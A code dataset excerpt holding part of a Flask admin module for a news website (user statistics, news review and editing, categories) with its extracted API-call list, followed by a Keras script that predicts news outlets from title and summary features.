return redirect("/")
@admin_blu.route("/user_count")
def user_count():
# 查询总人数
total_count = 0
try:
total_count = User.query.filter(User.is_admin == False).count()
except Exception as e:
current_app.logger.error(e)
# 查询月新增数
mon_count = 0
try:
now = time.localtime()
mon_begin = "%d-%02d-01" % (now.tm_year, now.tm_mon)
mon_begin_date = datetime.strptime(mon_begin, "%Y-%m-%d")
mon_count = User.query.filter(User.is_admin==False,
User.create_time > mon_begin_date).count()
except Exception as e:
current_app.logger.error(e)
day_count = 0
try:
day_begin = "%d-%02d-%02d" % (now.tm_year, now.tm_mon, now.tm_mday)
day_begin_date = datetime.strptime(day_begin, "%Y-%m-%d")
day_count = User.query.filter(User.is_admin==False,
User.create_time >= day_begin_date).count()
except Exception as e:
current_app.logger.error(e)
# 查询图表信息
# 获取到当天00:00:00时间
now_date = datetime.strptime(datetime.now().strftime("%Y-%m-%d"), "%Y-%m-%d")
print(now_date)
# 定义空数组,保存数据
active_date = list()
active_count = list()
# 依次添加数据,再反转
for i in range(0, 31):
begin_date = now_date - timedelta(days=i)
end_date = now_date - timedelta(days=(i - 1))
active_date.append(begin_date.strftime("%Y-%m-%d"))
count = 0
try:
count = User.query.filter(User.is_admin == False,
User.last_login >= begin_date,
User.last_login < end_date).count()
print(count)
except Exception as e:
current_app.logger.error(e)
active_count.append(count)
active_date.reverse()
active_count.reverse()
data = {"total_count": total_count, "mon_count": mon_count, "day_count": day_count,
"active_date": active_date, "active_count": active_count}
return render_template("admin/user_count.html", data=data)
@admin_blu.route("/user_list")
def user_list():
"""获取用户列表"""
# 获取参数
page = request.args.get("p", 1)
try:
print(page)
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
# 设置变量默认值
users = []
current_page = 1
total_page = 1
#查询数据
try:
paginate = User.query.filter(User.is_admin == False)\
.order_by(User.last_login.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
users = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.logger.error(e)
# 将模型列表转换成字典列表
users_list = []
for user in users:
users_list.append(user.to_admin_dict())
context = {
"total_page": total_page,
"current_page": current_page,
"users": users_list
}
return render_template("admin/user_list.html", data=context)
@admin_blu.route("/news_review")
def news_review():
"""返回待审核新闻列表"""
page = request.args.get("p", 1)
keywords = request.args.get("keywords", "")
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
news_list = list()
current_page = 1
total_page = 1
try:
filters = [News.status != 0]
# 如果有关键词
if keywords:
# 添加关键字检索选项
filters.append(News.title.contains(keywords))
paginate = News.query.filter(*filters)\
.order_by(News.create_time.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
news_list = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.error(e)
news_dict_list = list()
for news in news_list:
news_dict_list.append(news.to_review_dict())
data = {
"total_page": total_page,
"current_page": current_page,
"news_list": news_dict_list
}
return render_template("admin/news_review.html", data=data)
@admin_blu.route("/news_review_detail", methods=["GET", "POST"])
def news_review_detail():
"""新闻审核"""
# 获取新闻id
if request.method == "GET":
news_id = request.args.get("news_id")
if not news_id:
data = {
"errmsg": "未查询到数据"
}
return render_template("admin/news_review_detail.html", data=data)
# 通过id查询新闻
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
data = {
"errmsg": "未查询到数据"
}
return render_template("admin/news_review_detail.html", data=data)
# 返回数据
data = {
"news": news.to_dict()
}
return render_template("admin/news_review_detail.html", data=data)
# 执行审核操作
# 1. 获取参数
news_id = request.json.get("news_id")
action = request.json.get("action")
#2. 判断参数
if not all([news_id, action]):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
if action not in ("accept", "reject"):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
news = None
try:
# 3. 查询新闻
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
return jsonify(errno=RET.NODATA, errmsg="未查询到数据")
if action == "accept":
news.status = 0
else:
# 拒绝通过,需要获取原因
reason = request.json.get("reason")
if not reason:
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
news.reason = reason
news.status = -1
# 保存数据库
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
return jsonify(errno=RET.OK, errmsg="操作成功")
@admin_blu.route("/news_edit", methods=["GET", "POST"])
def news_edit():
"""返回新闻列表"""
page = request.args.get("p", "1")
print(page)
a = re.match(r"^\d*", page)
b = re.findall(r"""keywords=(\w*)""", page)
print(b)
page = a.group()
if b != []:
b = b[0]
keywords = b
else:
keywords = None
b = ""
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
news_list = list()
current_page = 1
total_page = 1
try:
filters = list()
# 如果有关键词
if keywords:
# 添加关键词的检索选项
filters.append(News.title.contains(keywords))
# 查询
paginate = News.query.filter(*filters)\
.order_by(News.create_time.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
news_list = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.logger.error(e)
news_dict_list = list()
for news in news_list:
news_dict_list.append(news.to_basic_dict())
data = {
"total_page": total_page,
"current_page": current_page,
"new_list": news_dict_list,
"last_input": b
}
if request.method == "GET":
return render_template("admin/news_edit.html", data=data)
# return jsonify(errno=RET.OK, errmsg="OK")
return render_template("admin/news_edit.html", data=data)
@admin_blu.route("/news_edit_detail", methods=["GET", "POST"])
def news_edit_detail():
"""新闻编辑详情"""
if request.method == "GET":
# 获取参数
news_id = request.args.get("news_id")
if not news_id:
data = {
"errmsg": "没有找到新闻"
}
return render_template("admin/news_edit_detail.html", data=data)
# 查询新闻
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
data = {
"errmsg": "没有找到新闻"
}
return render_template("admin/news_edit_detail.html", data=data)
categories = Category.query.all()
categories_li = []
for category in categories:
c_dict = category.to_dict()
c_dict["is_selected"] = False
if category.id == News.category_id:
c_dict["is_selected"] = True
categories_li.append(c_dict)
# 移除最新分类
categories_li.pop(0)
data = {
"news": news.to_dict(),
"categories": categories_li
}
return render_template("admin/news_edit_detail.html", data=data)
news_id = request.form.get("news_id")
title = request.form.get("title")
digest= request.form.get("digest")
content = request.form.get("content")
index_image = request.form.get("index-image")
categery_id = request.form.get("category_id")
# 1.1 判断数据是否有值:
if not all([title, digest, content, categery_id]):
return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
print(title, digest, content, categery_id)
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
return jsonify(errno=RET.NODATA, errmsg="未找到新闻数据")
# 1.2 尝试读取图片
if index_image:
try:
index_image = index_image.read()
except Exception as e:
return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
# 2. 将标题图片上传到七牛
try:
key = storage(index_image)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.THIRDERR, errmsg="上传图片错误")
news.index_image_url = constants.QINIU_DOMIN_PREFIX + key
# 3. 设置相关数据
news.title = title
news.digest = digest
news.content = content
news.category_id = categery_id
# 4. 保存到数据库
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
# 5. 返回结果
return jsonify(errno=RET.OK, errmsg="编辑成功")
@admin_blu.route("/news_category")
def get_news_category():
# 获取所有的分类数据
categories = Category.query.all()
# 定义列表保存分类数据
categories_dicts = []
for category in categories:
# 获取字典
cate_dict = category.to_dict()
# 拼接内容
categories_dicts.append(cate_dict)
categories_dicts.pop(0)
# 返回内容
data = {
"categories": categories_dicts
}
return render_template("admin/news_type.html", data=data)
@admin_blu.route("/add_category", methods=["POST"])
def add_category():
"""修改或者添加分类"""
category_id = request.json.get("id")
category_name = request.json.get("name")
print(category_name)
if not category_name:
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
# 判断是否有分类id
if category_id:
try:
category = Category.query.get(category_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="查询数据失败")
if not category:
return jsonify(errno=RET.NODATA, errmsg="未查询到分类信息")
category.name = category_name
return jsonify(errno=RET.OK, errmsg="保存数据成功")
else:
# 如果没有分类id, 添加分类
try:
new_category = Category()
new_category.id = category_id
new_category.name = category_name
db.session.add(new_category)
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
return jsonify(errno=RET.OK, errmsg="保存数据成功")
| [((39, 15, 39, 43), 'flask.request.form.get', 'request.form.get', ({(39, 32, 39, 42): '"""username"""'}, {}), "('username')", False, 'from flask import request\n'), ((40, 15, 40, 43), 'flask.request.form.get', 'request.form.get', ({(40, 32, 40, 42): '"""password"""'}, {}), "('password')", False, 'from flask import request\n'), ((145, 11, 145, 62), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((152, 11, 152, 35), 'flask.request.args.get', 'request.args.get', ({(152, 28, 152, 31): '"""p"""', (152, 33, 152, 34): '1'}, {}), "('p', 1)", False, 'from flask import request\n'), ((186, 11, 186, 64), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((192, 11, 192, 35), 'flask.request.args.get', 'request.args.get', ({(192, 28, 192, 31): '"""p"""', (192, 33, 192, 34): '1'}, {}), "('p', 1)", False, 'from flask import request\n'), ((193, 15, 193, 47), 'flask.request.args.get', 'request.args.get', ({(193, 32, 193, 42): '"""keywords"""', (193, 44, 193, 46): '""""""'}, {}), "('keywords', '')", False, 'from flask import request\n'), ((228, 11, 228, 63), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((263, 14, 263, 41), 'flask.request.json.get', 'request.json.get', ({(263, 31, 263, 40): '"""news_id"""'}, {}), "('news_id')", False, 'from flask import request\n'), ((264, 13, 264, 39), 'flask.request.json.get', 'request.json.get', ({(264, 30, 264, 38): '"""action"""'}, {}), "('action')", False, 'from flask import request\n'), ((298, 11, 298, 55), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((305, 11, 305, 37), 'flask.request.args.get', 'request.args.get', ({(305, 28, 305, 31): '"""p"""', (305, 33, 305, 36): '"""1"""'}, {}), "('p', '1')", False, 'from flask import request\n'), ((307, 8, 307, 31), 're.match', 're.match', ({(307, 17, 307, 24): '"""^\\\\d*"""', (307, 26, 307, 30): 'page'}, {}), "('^\\\\d*', page)", False, 'import re\n'), ((308, 8, 308, 47), 're.findall', 're.findall', ({(308, 19, 308, 40): '"""keywords=(\\\\w*)"""', (308, 42, 308, 46): 'page'}, {}), "('keywords=(\\\\w*)', page)", False, 'import re\n'), ((355, 11, 355, 61), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((399, 14, 399, 41), 'flask.request.form.get', 'request.form.get', ({(399, 31, 399, 40): '"""news_id"""'}, {}), "('news_id')", False, 'from flask import request\n'), ((400, 12, 400, 37), 'flask.request.form.get', 'request.form.get', ({(400, 29, 400, 36): '"""title"""'}, {}), "('title')", False, 'from flask import request\n'), ((401, 12, 401, 38), 'flask.request.form.get', 'request.form.get', ({(401, 29, 401, 37): '"""digest"""'}, {}), "('digest')", False, 'from flask import request\n'), ((402, 14, 402, 41), 'flask.request.form.get', 'request.form.get', ({(402, 31, 402, 40): '"""content"""'}, {}), "('content')", False, 'from flask import request\n'), ((403, 18, 403, 49), 'flask.request.form.get', 'request.form.get', ({(403, 35, 403, 48): '"""index-image"""'}, {}), "('index-image')", False, 'from flask import request\n'), ((404, 18, 404, 49), 'flask.request.form.get', 'request.form.get', ({(404, 35, 404, 48): '"""category_id"""'}, {}), "('category_id')", False, 'from flask import request\n'), ((447, 11, 447, 55), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((453, 17, 453, 37), 'info.models.Category.query.all', 'Category.query.all', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((468, 11, 468, 61), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((474, 18, 474, 40), 'flask.request.json.get', 'request.json.get', ({(474, 35, 474, 39): '"""id"""'}, {}), "('id')", False, 'from flask import request\n'), ((475, 20, 475, 44), 'flask.request.json.get', 'request.json.get', ({(475, 37, 475, 43): '"""name"""'}, {}), "('name')", False, 'from flask import request\n'), ((32, 18, 32, 46), 'flask.session.get', 'session.get', ({(32, 30, 32, 39): '"""user_id"""', (32, 41, 32, 45): 'None'}, {}), "('user_id', None)", False, 'from flask import session\n'), ((33, 19, 33, 49), 'flask.session.get', 'session.get', ({(33, 31, 33, 41): '"""is_admin"""', (33, 43, 33, 48): 'False'}, {}), "('is_admin', False)", False, 'from flask import session\n'), ((36, 15, 36, 50), 'flask.render_template', 'render_template', ({(36, 31, 36, 49): '"""admin/login.html"""'}, {}), "('admin/login.html')", False, 'from flask import render_template\n'), ((42, 15, 42, 73), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((51, 15, 51, 76), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((54, 15, 54, 73), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((57, 15, 57, 82), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((65, 20, 65, 48), 'flask.url_for', 'url_for', ({(65, 28, 65, 47): '"""admin.admin_index"""'}, {}), "('admin.admin_index')", False, 'from flask import url_for\n'), ((79, 18, 79, 40), 'flask.session.get', 'session.get', ({(79, 30, 79, 39): '"""user_id"""'}, {}), "('user_id')", False, 'from flask import session\n'), ((80, 19, 80, 49), 'flask.session.get', 'session.get', ({(80, 31, 80, 41): '"""is_admin"""', (80, 43, 80, 48): 'False'}, {}), "('is_admin', False)", False, 'from flask import session\n'), ((99, 14, 99, 30), 'time.localtime', 'time.localtime', ({}, {}), '()', False, 'import time\n'), ((101, 25, 101, 65), 'datetime.datetime.strptime', 'datetime.strptime', ({(101, 43, 101, 52): 'mon_begin', (101, 54, 101, 64): '"""%Y-%m-%d"""'}, {}), "(mon_begin, '%Y-%m-%d')", False, 'from datetime import datetime, timedelta\n'), ((110, 25, 110, 65), 'datetime.datetime.strptime', 'datetime.strptime', ({(110, 43, 110, 52): 'day_begin', (110, 54, 110, 64): '"""%Y-%m-%d"""'}, {}), "(day_begin, '%Y-%m-%d')", False, 'from datetime import datetime, timedelta\n'), ((236, 18, 236, 45), 'flask.request.args.get', 'request.args.get', ({(236, 35, 236, 44): '"""news_id"""'}, {}), "('news_id')", False, 'from flask import request\n'), ((259, 15, 259, 74), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((268, 15, 268, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((270, 15, 270, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((275, 15, 275, 38), 'info.models.News.query.get', 'News.query.get', ({(275, 30, 275, 37): 'news_id'}, {}), '(news_id)', False, 'from info.models import User, Category, News\n'), ((280, 15, 280, 69), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((286, 17, 286, 43), 'flask.request.json.get', 'request.json.get', ({(286, 34, 286, 42): '"""reason"""'}, {}), "('reason')", False, 'from flask import request\n'), ((293, 8, 293, 27), 'info.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from info import constants, db\n'), ((353, 15, 353, 65), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((363, 18, 363, 45), 'flask.request.args.get', 'request.args.get', ({(363, 35, 363, 44): '"""news_id"""'}, {}), "('news_id')", False, 'from flask import request\n'), ((382, 21, 382, 41), 'info.models.Category.query.all', 'Category.query.all', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((397, 15, 397, 72), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((407, 15, 407, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((411, 15, 411, 38), 'info.models.News.query.get', 'News.query.get', ({(411, 30, 411, 37): 'news_id'}, {}), '(news_id)', False, 'from info.models import User, Category, News\n'), ((415, 15, 415, 72), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((440, 8, 440, 27), 'info.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from info import constants, db\n'), ((478, 15, 478, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((491, 15, 491, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((505, 15, 505, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((47, 8, 47, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(47, 33, 47, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((48, 15, 48, 73), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((78, 32, 78, 60), 'flask.url_for', 'url_for', ({(78, 40, 78, 59): '"""admin.admin_login"""'}, {}), "('admin.admin_login')", False, 'from flask import url_for\n'), ((84, 19, 84, 32), 'flask.redirect', 'redirect', ({(84, 28, 84, 31): '"""/"""'}, {}), "('/')", False, 'from flask import redirect\n'), ((94, 8, 94, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(94, 33, 94, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((105, 8, 105, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(105, 33, 105, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((114, 8, 114, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(114, 33, 114, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((126, 32, 126, 49), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((127, 30, 127, 53), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((157, 8, 157, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(157, 33, 157, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((174, 8, 174, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(174, 33, 174, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((197, 8, 197, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(197, 33, 197, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((217, 8, 217, 28), 'flask.current_app.error', 'current_app.error', ({(217, 26, 217, 27): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((241, 19, 241, 78), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((245, 19, 245, 42), 'info.models.News.query.get', 'News.query.get', ({(245, 34, 245, 41): 'news_id'}, {}), '(news_id)', False, 'from info.models import User, Category, News\n'), ((253, 19, 253, 78), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((277, 8, 277, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(277, 33, 277, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((288, 19, 288, 69), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((295, 8, 295, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(295, 33, 295, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((296, 8, 296, 29), 'info.db.session.rollback', 'db.session.rollback', ({}, {}), '()', False, 'from info import constants, db\n'), ((297, 15, 297, 68), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((320, 8, 320, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(320, 33, 320, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((340, 8, 340, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(340, 33, 340, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((368, 19, 368, 76), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((372, 19, 372, 42), 'info.models.News.query.get', 'News.query.get', ({(372, 34, 372, 41): 'news_id'}, {}), '(news_id)', False, 'from info.models import User, Category, News\n'), ((380, 19, 380, 76), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((413, 8, 413, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(413, 33, 413, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((426, 18, 426, 38), 'info.utils.image_storage.storage', 'storage', ({(426, 26, 426, 37): 'index_image'}, {}), '(index_image)', False, 'from info.utils.image_storage import storage\n'), ((442, 8, 442, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(442, 33, 442, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((443, 8, 443, 29), 'info.db.session.rollback', 'db.session.rollback', ({}, {}), '()', False, 'from info import constants, db\n'), ((444, 15, 444, 68), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((482, 23, 482, 54), 'info.models.Category.query.get', 'Category.query.get', ({(482, 42, 482, 53): 'category_id'}, {}), '(category_id)', False, 'from info.models import User, Category, News\n'), ((488, 19, 488, 79), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((496, 27, 496, 37), 'info.models.Category', 'Category', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((499, 12, 499, 40), 'info.db.session.add', 'db.session.add', ({(499, 27, 499, 39): 'new_category'}, {}), '(new_category)', False, 'from info import constants, db\n'), ((500, 12, 500, 31), 'info.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from info import constants, db\n'), ((35, 28, 35, 50), 'flask.url_for', 'url_for', ({(35, 36, 35, 49): '"""admin_index"""'}, {}), "('admin_index')", False, 'from flask import url_for\n'), ((45, 15, 45, 57), 'info.models.User.query.filter', 'User.query.filter', ({(45, 33, 45, 56): 'User.mobile == username'}, {}), '(User.mobile == username)', False, 'from info.models import User, Category, News\n'), ((92, 22, 92, 63), 'info.models.User.query.filter', 'User.query.filter', ({(92, 40, 92, 62): 'User.is_admin == False'}, {}), '(User.is_admin == False)', False, 'from info.models import User, Category, News\n'), ((102, 20, 103, 72), 'info.models.User.query.filter', 'User.query.filter', ({(102, 38, 102, 58): 'User.is_admin == False', (103, 38, 103, 71): 'User.create_time > mon_begin_date'}, {}), '(User.is_admin == False, User.create_time > mon_begin_date)', False, 'from info.models import User, Category, News\n'), ((111, 20, 112, 73), 'info.models.User.query.filter', 'User.query.filter', ({(111, 38, 111, 58): 'User.is_admin == False', (112, 38, 112, 72): 'User.create_time >= day_begin_date'}, {}), '(User.is_admin == False, User.create_time >= day_begin_date)', False, 'from info.models import User, Category, News\n'), ((118, 33, 118, 47), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((136, 12, 136, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(136, 37, 136, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((209, 27, 209, 56), 'info.models.News.title.contains', 'News.title.contains', ({(209, 47, 209, 55): 'keywords'}, {}), '(keywords)', False, 'from info.models import User, Category, News\n'), ((247, 12, 247, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(247, 37, 247, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((331, 27, 331, 56), 'info.models.News.title.contains', 'News.title.contains', ({(331, 47, 331, 55): 'keywords'}, {}), '(keywords)', False, 'from info.models import User, Category, News\n'), ((374, 12, 374, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(374, 37, 374, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((422, 19, 422, 69), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((428, 12, 428, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(428, 37, 428, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((429, 19, 429, 75), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((484, 12, 484, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(484, 37, 484, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((485, 19, 485, 72), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((502, 12, 502, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(502, 37, 502, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((503, 12, 503, 33), 'info.db.session.rollback', 'db.session.rollback', ({}, {}), '()', False, 'from info import constants, db\n'), ((504, 19, 504, 72), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((131, 20, 133, 64), 'info.models.User.query.filter', 'User.query.filter', ({(131, 38, 131, 60): 'User.is_admin == False', (132, 37, 132, 66): 'User.last_login >= begin_date', (133, 37, 133, 63): 'User.last_login < end_date'}, {}), '(User.is_admin == False, User.last_login >= begin_date, \n User.last_login < end_date)', False, 'from info.models import User, Category, News\n'), ((168, 22, 168, 44), 'info.models.User.last_login.desc', 'User.last_login.desc', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((211, 22, 211, 45), 'info.models.News.create_time.desc', 'News.create_time.desc', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((334, 22, 334, 45), 'info.models.News.create_time.desc', 'News.create_time.desc', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((167, 19, 167, 60), 'info.models.User.query.filter', 'User.query.filter', ({(167, 37, 167, 59): 'User.is_admin == False'}, {}), '(User.is_admin == False)', False, 'from info.models import User, Category, News\n'), ((210, 19, 210, 46), 'info.models.News.query.filter', 'News.query.filter', ({(210, 37, 210, 45): '*filters'}, {}), '(*filters)', False, 'from info.models import User, Category, News\n'), ((333, 19, 333, 46), 'info.models.News.query.filter', 'News.query.filter', ({(333, 37, 333, 45): '*filters'}, {}), '(*filters)', False, 'from info.models import User, Category, News\n')] |
Swati17293/outlet-prediction | src/predict_model.py | 3c1f41b88d71b5247763bacc9dbc1abf5d0619a2 | #Answer Generation
import csv
import os
import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text
def load_model():
print('\nLoading model...')
# load json and create model
json_file = open('models/MODEL.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
gate_model = model_from_json(loaded_model_json)
# load weights into new model
gate_model.load_weights('models/MODEL.h5', by_name=True)
return gate_model
train_ans, anslist = [], []
def ans_vec():
anslist = []
dataset = ['Train']
for data in dataset:
f = open('data/raw/' + data + '.csv')
lines = csv.reader(f)
for line in lines:
source_uri = line[4]
anslist.append(source_uri)
f.close()
return anslist
def generate_save_ans():
dic = 3
anslist = ans_vec()
gate_model = load_model()
test_title_feature = np.load('data/vectorized/Test_title.npy')
test_summary_feature = np.load('data/vectorized/Test_summary.npy')
tokenizer_a = text.Tokenizer(num_words=dic+1)
tokenizer_a.fit_on_texts(anslist)
dic_a = tokenizer_a.word_index
ind_a ={value:key for key, value in dic_a.items()}
num_test = len(open('data/raw/Test.csv', 'r').readlines())
ans = gate_model.predict([ test_title_feature, test_summary_feature])
fp = open('reports/Test.ans', 'w')
for h in range(num_test):
i = h
if np.argmax(ans[i][0],axis=0) == 0:
fp.write('indiatimes\n') #Low frequency words are replaced with "indiatimes"
else:
for j in range(dic):
an = np.argmax(ans[i][j],axis=0)
if j != dic-1:
anext = np.argmax(ans[i][j+1],axis=0)
if an != 0 and anext != 0: #Words before and after
if an == anext:
fp.write('') #Delete duplicate words
else:
fp.write(ind_a[an] + ' ')
elif an != 0 and anext == 0:
fp.write(ind_a[an])
elif an == 0 and anext != 0:
fp.write(ind_a[anext])
else:
fp.write('')
else:
if an != 0:
fp.write(ind_a[an] + '\n')
else:
fp.write('\n')
fp.close()
def main():
load_model()
print('\n\nGenerating answers...')
if os.path.exists('reports') == False:
os.mkdir('reports')
if os.path.isfile('reports/Test.ans') == False:
generate_save_ans()
print('\nAnswer generation complete...\n\n')
if __name__ == "__main__":
main() | [((50, 25, 50, 66), 'numpy.load', 'np.load', ({(50, 33, 50, 65): '"""data/vectorized/Test_title.npy"""'}, {}), "('data/vectorized/Test_title.npy')", True, 'import numpy as np\n'), ((51, 27, 51, 70), 'numpy.load', 'np.load', ({(51, 35, 51, 69): '"""data/vectorized/Test_summary.npy"""'}, {}), "('data/vectorized/Test_summary.npy')", True, 'import numpy as np\n'), ((53, 18, 53, 49), 'keras.preprocessing.text.Tokenizer', 'text.Tokenizer', (), '', False, 'from keras.preprocessing import text\n'), ((32, 16, 32, 29), 'csv.reader', 'csv.reader', ({(32, 27, 32, 28): 'f'}, {}), '(f)', False, 'import csv\n'), ((96, 7, 96, 32), 'os.path.exists', 'os.path.exists', ({(96, 22, 96, 31): '"""reports"""'}, {}), "('reports')", False, 'import os\n'), ((97, 8, 97, 27), 'os.mkdir', 'os.mkdir', ({(97, 17, 97, 26): '"""reports"""'}, {}), "('reports')", False, 'import os\n'), ((99, 7, 99, 41), 'os.path.isfile', 'os.path.isfile', ({(99, 22, 99, 40): '"""reports/Test.ans"""'}, {}), "('reports/Test.ans')", False, 'import os\n'), ((66, 11, 66, 38), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((70, 21, 70, 48), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((72, 28, 72, 57), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n')] |
